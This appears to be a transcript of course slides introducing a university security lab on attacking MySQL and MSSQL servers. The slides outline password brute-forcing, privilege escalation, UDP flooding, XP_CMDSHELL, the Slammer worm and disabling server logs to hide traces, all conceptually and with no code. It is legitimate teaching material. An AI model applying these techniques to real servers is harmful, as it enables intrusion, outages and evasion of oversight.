Transcript Databases - ECE Users Pages

Databases
Kevin Wright
Ben Bruckner
Group 40
Outline
Background
 Vulnerabilities
 Log File Cleaning
 This Lab

Background: Databases

Store very large volumes of information




Credit card numbers
Names
Dates
Database servers make this information available on the
internet


Retail sites can remember your billing and shipping information
Allows web surfers to browse through all of a company’s
products online
Background: SQL Servers
Group data into tables and tables into
databases
 Database servers are generally not
connected directly to the internet, but
rather are connected to web servers
 SQL = Structured Query Language, which
can be used to create, delete, modify, or
query data from a database

Typical Database Server Setup
Lots of security
User’s
machine
internet
Company’s
internet server
Password crack, Buffer
overflow, SQL injection, weak
default settings, etc...
Not much
security
Company’s
database server
Different Databases

MySQL 4.23





Microsoft SQL Server 2000




http://www.mysql.com
“The world’s most popular open source database”
Runs on Windows and a wide variety of Unix operating systems,
including Mac OS X
Since it is open source, we can use it for free
Very popular (because it’s Microsoft)
Runs on a “more user friendly” GUI than MySQL
In the lab, we will actually be using a free trial version because
the full version costs between $1,000 and $20,000 per machine.
Other databases include Oracle, IBM DB2, Sybase, etc.
Using a Database Server

The database server is set up on a computer and acts
much like a web server





MySQL runs on port 3306
MSSQL runs on ports 1433 and 1434
Other computers can connect remotely to this database
server and access information
Access privileges are controlled with usernames and
passwords, much like in Unix
Numerous exploits exist that grant root access (thus
allowing the attacker to have access to everything that is
stored in the database) or crash the database server
MySQL Vulnerabilities




Countless buffer overflow vulnerabilities allow
exploitable code to be run at the root level or
can be used in DOS attacks
Password authentication is weak and can be
exploited so that a user can log on as someone
else (sometimes root)
There are several ways for someone with a user
account to gain root privileges just by using the
right combination of commands
Many others…
MSSQL Vulnerabilites





The target of many worms such as SQLSnake and SQLSlammer
Many of the default settings are exploitable (such as
setting the system administrator’s password to null)
Again, buffer overflow vulnerabilities are abundant
Many others…
It is essential to be diligent about downloading the
newest patches for MSSQL (and all other Microsoft
products)
Other Vulnerabilities

SQL Injection
 Database
that is linked to a website via a form
 SQL commands are entered into the form
fields
ODBC
 JDBC

Log File Editing




Most, if not all servers keep a log of all of the
transactions that take place
A perfect attack would be one which left no
evidence of anything ever occurring
Much of the evidence in server logs contains
evidence that can be used to track down the
hacker
In the lab, you will halt the logging function
before you do anything malicious so that no
trace is left behind
MySQL Exploits Used in This Lab

Password busting
 Run
a simple script to decrypt the root password in a
brute fashion

Privilege Escalation
 Start
with user access
 Using only SQL commands, gain root access

Denial of Service
 Remotely
shut the server down by flooding port 3306
with UDP traffic
MSSQL Exploits Used in This Lab


Password
XP_CMDSHELL



The MSSQL server command XP_CMDSHELL
opens up a windows shell
If we gain access to a Windows command shell, we
gain access to the server
Slammer Worm

The worm was widely circulated and targeted a
buffer overflow vulnerability in MSSQL Server 2000
that was used in a Denial of Service (DoS) attack
Lab Overview




Machines running MySQL server and MSSQL
server have been set up by the TAs
You must gain access to these machines to run
the aforementioned exploits on the servers
The exploits will either shut the servers down or
give you access to sensitive information
Explore how to disable the logger to cover your
tracks